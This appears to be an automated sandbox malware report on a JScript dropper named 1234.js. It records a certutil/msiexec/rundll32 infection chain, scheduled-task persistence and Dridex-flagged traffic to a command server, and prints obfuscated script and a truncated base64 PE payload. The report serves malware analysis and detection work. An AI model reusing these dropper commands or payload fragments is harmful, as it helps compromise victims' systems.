Windows Analysis Report
1234.js

Overview

General Information

Sample name: 1234.js
Analysis ID: 1541406
MD5: 7dea02845300c31f60e21494c492c870
SHA1: 8ebbbeeb723eea278a343e95d1243577c445845b
SHA256: 9b38cc509b1a4a401275bcb5e896917c842431f9190c417147c35b20b99c4d85
Tags: jsuser-pr0xylife
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Found evasive API chain (may stop execution after checking mutex)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential obfuscated javascript found
Sigma detected: WScript or CScript Dropper
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Msiexec Execute Arbitrary DLL
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic

Classification

Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FFE1A5113A0

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: 1234.js Argument value : ['"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad'] Go to definition
Source: 1234.js Argument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad'] Go to definition
Source: 1234.js Argument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad'] Go to definition

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 185.161.251.26 443 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NTLGB NTLGB
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50002 -> 185.161.251.26:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50003 -> 185.161.251.26:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511C40 LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 11_2_00007FFE1A511C40
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/0
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/I
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/O&=
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/P
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://185.161.251.26/nfoEx2
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Tasks\Tyrannosaurus Tech.job Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511C40 11_2_00007FFE1A511C40
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5145E0 11_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5168A0 11_2_00007FFE1A5168A0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A512C40 11_2_00007FFE1A512C40
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A513F30 11_2_00007FFE1A513F30
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51CD38 11_2_00007FFE1A51CD38
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A523508 11_2_00007FFE1A523508
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51B310 11_2_00007FFE1A51B310
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5218C0 11_2_00007FFE1A5218C0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A51EFB0 11_2_00007FFE1A51EFB0
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A511990 11_2_00007FFE1A511990
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A515160 11_2_00007FFE1A515160
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A518F68 11_2_00007FFE1A518F68
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A513170 11_2_00007FFE1A513170
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A522578 11_2_00007FFE1A522578
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A522D5C 11_2_00007FFE1A522D5C
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A5221C8 11_2_00007FFE1A5221C8
Java / VBScript file with very long strings (likely obfuscated code)
Source: 1234.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal76.evad.winJS@8/4@0/1
Source: C:\Windows\System32\rundll32.exe Code function: 11_2_00007FFE1A517740 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize, 11_2_00007FFE1A517740
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\5bba9e40-0e32-4b7f-b39a-667bbc0c2293
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\rad603BF.tmp Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js"
Source: unknown Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: unknown Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: CreateTextFile(encoded_name);var t0='';t0=t0.concat('TVqQAAMAAAAEAAAA//8AAL');t0=t0.concat('gAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGh');t0=t0.concat('pcyBwcm9ncmFtIG');t0=t0.concat('Nhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQR');t0=t0.concat('QAAZIYGAGiDJFsAAAAAAAAAAPAAIiALAgwAADQBAADyAAAAAAAAv');t0=t0.concat('IoAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAA');t0=t0.concat('GAAAAAAAAAABwAgAABAAAAAA');t0=t0.concat('AAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQA');t0=t0.concat('AAAAAAAEAAAAAAAAAAAAAAQAAAAUNoBALgAAAAI2wEAjA');t0=t0.concat('AAAABQAgDgAQAAADACAHARAAAAAAAAAAAAAABgA');t0=t0.concat('gDABQAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAA');t0=t0.concat('ABQxQEAcAAAAAAAAAAAAAAAAFABAJADAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV');t0=t0.concat('4dAAAADQyAQAAEAAAADQBAA');t0=t0.concat('AEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC4lgAAAFABA');t0=t0.concat('ACYAAAAOAEAAAAAAAAAAAAAAAAAQAAAQC5kY');t0=t0.concat('XRhAAAAuD8AAADwAQAAGgAAANA');t0=t0.concat('BAAAAAAAAAAAAAAA');t0=t0.concat('AAEAAAMAucGRhdGEAAHARAAAAMAIAABIAAADq');t0=t0.concat('AQAAAAAAAAAAAAAAA');t0=t0.concat('ABAAABALnJzcmMAAADgAQAAAFACA');t0=t0.concat('AACAAAA/AEAAAAA');t0=t0.concat('AAAAAAAAAAAAQAAAQC5');t0=t0.concat('yZWxvYwAAwAUAAABgAgAABgAAAP4BAAAAAAAAAAAAAAAA');t0=t0.concat('AEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAIPBArhWVVVV9+mLwsHoHwPQjQSVAQAAAMPMzMzM');t0=t0.concat('zMzMSIlcJAhIiXQkEEiJfCQYQY1A/kUz0kiL+kiYSIvZTI');t0=t0.concat('vJSI01yEMBAEiFwA+Ok');t0=t0.concat('AAAAEyNUP9MjVoBSLir');t0=t0.concat('qqqqqqqqqkn34kjR6kj/wkSNFFJBD7ZD/0mDwQR');t0=t0.concat('NjVsDSMHoAg+2BDBBiEH8QQ++');t0=t0.concat('Q/yD4APB4ARIY8hBD7ZD/cHoBEgLyA+2BDFBiEH9QQ++Q/2D4A/B4');t0=t0.concat('AJIY8hBD7ZD/kjB6AZIC8gPtgQxQYhB/kkPvkP+g+A/D7YE');t0=t0.concat('MEGIQf9I/8p1j0U70H1ySWPSSAPXD7YCSMHoAg+');t0=t0.concat('2BDBBiAFBjUD/RDvQD74CdReD4APB4ARImA+2BDBBiEEB');t0=t0.concat('QcZBAj3rL4PgA8HgB');t0=t0.concat('EhjyA+2QgHB6ARIC8gPtgQxQYhBAQ+');t0=t0.concat('+QgGD4A/B4AJImA+2BDBBiEECSYPBA0');t0=t0.concat('n/wUHGQf89SIt0JBBIi3wkGEHGAQBMK8tIi1wkCEmNQQHDzMzMzM');t0=t0.concat('zMzMzMzMzMzEiJXCQISIl0JBBI');t0=t0.concat('iXwkGEGNQP5FM9JIi/pImEiL2UyLyUiNNbhCAQBIh');t0=t0.concat('cAPjpAAAABMjVD/TI1aAUi4q6qqqqqqqqpJ9+J');t0=t0.concat('I0epI/8JEjRRSQQ+2Q/9Jg8E
Potential obfuscated javascript found
Source: 1234.js Initial file: High amount of function use 7
Contains functionality to dynamically determine API calls
